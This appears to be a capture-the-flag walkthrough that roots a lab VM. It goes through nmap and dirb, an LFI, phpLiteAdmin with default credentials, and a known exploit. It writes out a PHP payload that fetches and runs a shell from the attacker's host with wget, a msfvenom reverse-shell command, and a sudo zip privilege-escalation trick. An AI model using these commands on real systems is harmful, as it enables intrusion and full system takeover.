First of all and after detecting our target machine with netdiscover we run a nmap portscan with
nmap -T5 -Pn -sV 192.168.1.60
Here we see that apparently we have ports 22, 80 and 111 open and a web server running on port 80.
THe port 80 it’s always an interesting one as you can find a lot of vulnerabilities on web applications these days so we go for that
After accessing the web server on that machine for the first time we can see a simple and small web app. That web app has an interesting feature
By exploring the site we see that the page itself includes some external html file, it may use some php function like include() for getting the html content of tools.html.
This may lead to RFI/LFI vulnerabilities, we can check that with:
And here we see the content of the file /etc/passwd
After than we can check if we can directly exploit an RFI/LFI vulnerability by trying to include content from another web server (shellcode inclusion) or we can also try to include a log file and then do a log based LFI attack. In my case I tried those techniques with no result so I decided to move forward on the server.
We can use tools such as nikto or dirb to look for easy to find vulnerabilities and misconfigurations and also to reveal hidden directories which may contain interesting and vulnerable web apps
So we first run:
nikto -h http://192.168.1.2
After running nikto we don’t see anything specially interesting
We then can try to run dirbuster with
dirb http://192.168.1.2 -d /usr/share/wordlists/dirb/common.txt
As we can see after doing that we are able to find another interesting web app on the server “phpLiteAdmin”. That app is actually a GUI for managing databases.
The web app is poorly configurated we can easy see that we can use “admin” as a password and enter with privileged access on the db admin app
After accessing the web app we can see that we have full control of it, that includes creating and administrating databases.
We then can use searchploit or directly search on the exploit-db.com and find vulnerabilities on that app (as it shows the exact version once we log in)
So we just found an exploit: https://www.exploit-db.com/exploits/24044/
Basically, we can create a new database and name it whatever.php and that database will be actually written as a php file on the disk. We can also write php code in its tables and that code may be executed with “php db.php”
So we try to run a small test:
We can insert the code by creating a table and inserting php code in a TEXT field on a random table
As we previously found an LFI vulnerability on the server, we can use that to call the “database” we just created and then:
Yes! We can execute code.
So the next natural step here is to create a shell with some tool like metasploit and use that “feature” on the web app to run that on the server.
We create a reverse shell with metasploit with:
msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp
And we use the msf multi handler to start listening for connections related to that shell
We’ll be able to server that shell binary to the remote target server over http with a simple web server started on the attackers machine.
python -m SImpleHTTPServer
will start a web server on port 8000 serving files of the local directory.
We can basically create a table with the code:
<?php exec(“wget http://ourip:8000/shell -o /tmp && chmod 755 /tmp/shell && /tmp/shell”); ?>
And use the LFI vuln as we did previously to call that
Once we have a shell in the server we can move around the file system and look for hardcoded passwords, suid files and local privesc vulnerabilities.
After searching for some time:
We are able to find a user and a password for DB. While doing pentests, it’s pretty common to find a lot of password re-utilization, so we try SSH
And we can access the system!
An interesting thing to do is to check whatever the user can do and if it’s in the sudoers. As we saw tar and zip are executed as root here.
So we can perform a simple trick:
sudo -u root zip /tmp/exploit.zip /tmp/exploit -T –unzip-command=”bash -c /bin/bash”
This will basically try to extract a fake zip file and will run bash -c /bin/bash which opens a shell and as we are running this with root privileges, the shell will be a root shell
After doing that we have root access to the system and we can basically do whatever we want.